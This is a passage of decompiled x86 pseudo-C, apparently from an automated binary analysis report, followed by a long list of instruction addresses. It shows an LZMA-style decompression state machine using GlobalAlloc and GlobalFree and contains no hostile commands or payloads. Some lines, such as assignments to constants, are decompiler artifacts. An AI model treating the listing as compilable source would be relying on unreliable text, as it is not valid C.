								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                    0x00000000
                                                                                    0x00406131
                                                                                    0x00406131
                                                                                    0x00406136
                                                                                    0x004061ad
                                                                                    0x004061b4
                                                                                    0x004061be
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00406813
                                                                                    0x00406813
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x004067ee
                                                                                    0x004067ee
                                                                                    0x004067f2
                                                                                    0x004069a1
                                                                                    0x00000000
                                                                                    0x004069a1
                                                                                    0x004067fe
                                                                                    0x00406805
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00000000
                                                                                    0x00406810
                                                                                    0x00406138
                                                                                    0x00406138
                                                                                    0x0040613c
                                                                                    0x00406144
                                                                                    0x00406147
                                                                                    0x00406149
                                                                                    0x0040614c
                                                                                    0x0040614e
                                                                                    0x00406153
                                                                                    0x00406156
                                                                                    0x0040615d
                                                                                    0x00406164
                                                                                    0x00406167
                                                                                    0x00406172
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406174
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406169
                                                                                    0x00406181
                                                                                    0x0040619f
                                                                                    0x004061a1
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x0040637a
                                                                                    0x0040637d
                                                                                    0x00406380
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x00406389
                                                                                    0x0040638c
                                                                                    0x00406392
                                                                                    0x004063aa
                                                                                    0x004063ad
                                                                                    0x004063b0
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063bc
                                                                                    0x00406394
                                                                                    0x00406394
                                                                                    0x0040639c
                                                                                    0x004063a1
                                                                                    0x004063a3
                                                                                    0x004063a5
                                                                                    0x004063a5
                                                                                    0x004063c6
                                                                                    0x004063c9
                                                                                    0x0040636c
                                                                                    0x00406372
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00406347
                                                                                    0x0040634b
                                                                                    0x00406953
                                                                                    0x00000000
                                                                                    0x00406953
                                                                                    0x00406351
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040635b
                                                                                    0x0040635e
                                                                                    0x00406364
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406369
                                                                                    0x00000000
                                                                                    0x00406369
                                                                                    0x00406183
                                                                                    0x00406183
                                                                                    0x00406186
                                                                                    0x0040618c
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x00406191
                                                                                    0x00406194
                                                                                    0x00406196
                                                                                    0x00406197
                                                                                    0x0040619a
                                                                                    0x00406207
                                                                                    0x00406207
                                                                                    0x0040620b
                                                                                    0x0040620e
                                                                                    0x00406211
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x00406218
                                                                                    0x0040621b
                                                                                    0x0040621d
                                                                                    0x00406223
                                                                                    0x00406226
                                                                                    0x00406229
                                                                                    0x0040622c
                                                                                    0x0040622f
                                                                                    0x00406235
                                                                                    0x00406251
                                                                                    0x00406254
                                                                                    0x00406257
                                                                                    0x0040625a
                                                                                    0x00406261
                                                                                    0x00406267
                                                                                    0x0040626b
                                                                                    0x00406237
                                                                                    0x00406237
                                                                                    0x0040623b
                                                                                    0x00406243
                                                                                    0x00406248
                                                                                    0x0040624a
                                                                                    0x0040624c
                                                                                    0x0040624c
                                                                                    0x00406275
                                                                                    0x00406278
                                                                                    0x004061ef
                                                                                    0x004061ef
                                                                                    0x004061f5
                                                                                    0x004062a8
                                                                                    0x004062ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062b0
                                                                                    0x004062b3
                                                                                    0x004062b6
                                                                                    0x004062b9
                                                                                    0x004062bc
                                                                                    0x004062bf
                                                                                    0x004062c2
                                                                                    0x004062c5
                                                                                    0x004062c8
                                                                                    0x004062ce
                                                                                    0x004062e6
                                                                                    0x004062e9
                                                                                    0x004062ec
                                                                                    0x004062ef
                                                                                    0x004062ef
                                                                                    0x004062f2
                                                                                    0x004062f8
                                                                                    0x004062d0
                                                                                    0x004062d0
                                                                                    0x004062d8
                                                                                    0x004062dd
                                                                                    0x004062df
                                                                                    0x004062e1
                                                                                    0x004062e1
                                                                                    0x00406302
                                                                                    0x00406305
                                                                                    0x00406283
                                                                                    0x00406287
                                                                                    0x00406947
                                                                                    0x00000000
                                                                                    0x00406947
                                                                                    0x0040628d
                                                                                    0x00406290
                                                                                    0x00406293
                                                                                    0x00406297
                                                                                    0x0040629a
                                                                                    0x004062a0
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a5
                                                                                    0x004062a5
                                                                                    0x00406305
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x00406310
                                                                                    0x00406310
                                                                                    0x00406313
                                                                                    0x00406316
                                                                                    0x0040631a
                                                                                    0x0040695f
                                                                                    0x00000000
                                                                                    0x0040695f
                                                                                    0x00406320
                                                                                    0x00406323
                                                                                    0x00406326
                                                                                    0x00406329
                                                                                    0x0040632c
                                                                                    0x0040632f
                                                                                    0x00406332
                                                                                    0x00406334
                                                                                    0x00406337
                                                                                    0x0040633a
                                                                                    0x0040633d
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x004064dc
                                                                                    0x004064dc
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00000000
                                                                                    0x004064df
                                                                                    0x00406201
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x004061ca
                                                                                    0x004061ce
                                                                                    0x0040693b
                                                                                    0x004069b7
                                                                                    0x004069bf
                                                                                    0x004069c6
                                                                                    0x004069c8
                                                                                    0x004069cf
                                                                                    0x004069d3
                                                                                    0x004069d3
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x004061da
                                                                                    0x004061de
                                                                                    0x004061e1
                                                                                    0x004061e7
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x00000000
                                                                                    0x004061ec
                                                                                    0x00406278
                                                                                    0x00406181
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fbe
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x00000000
                                                                                    0x004069cc
                                                                                    0x00405fc4
                                                                                    0x00000000
                                                                                    0x00405fcf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fd8
                                                                                    0x00405fdb
                                                                                    0x00405fde
                                                                                    0x00405fe2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fe8
                                                                                    0x00405feb
                                                                                    0x00405fed
                                                                                    0x00405fee
                                                                                    0x00405ff1
                                                                                    0x00405ff3
                                                                                    0x00405ff4
                                                                                    0x00405ff6
                                                                                    0x00405ff9
                                                                                    0x00405ffe
                                                                                    0x00406003
                                                                                    0x0040600c
                                                                                    0x0040601f
                                                                                    0x00406022
                                                                                    0x0040602e
                                                                                    0x00406056
                                                                                    0x00406058
                                                                                    0x00406066
                                                                                    0x00406066
                                                                                    0x0040606a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x0040605a
                                                                                    0x0040605d
                                                                                    0x0040605e
                                                                                    0x0040605e
                                                                                    0x00000000
                                                                                    0x0040605a
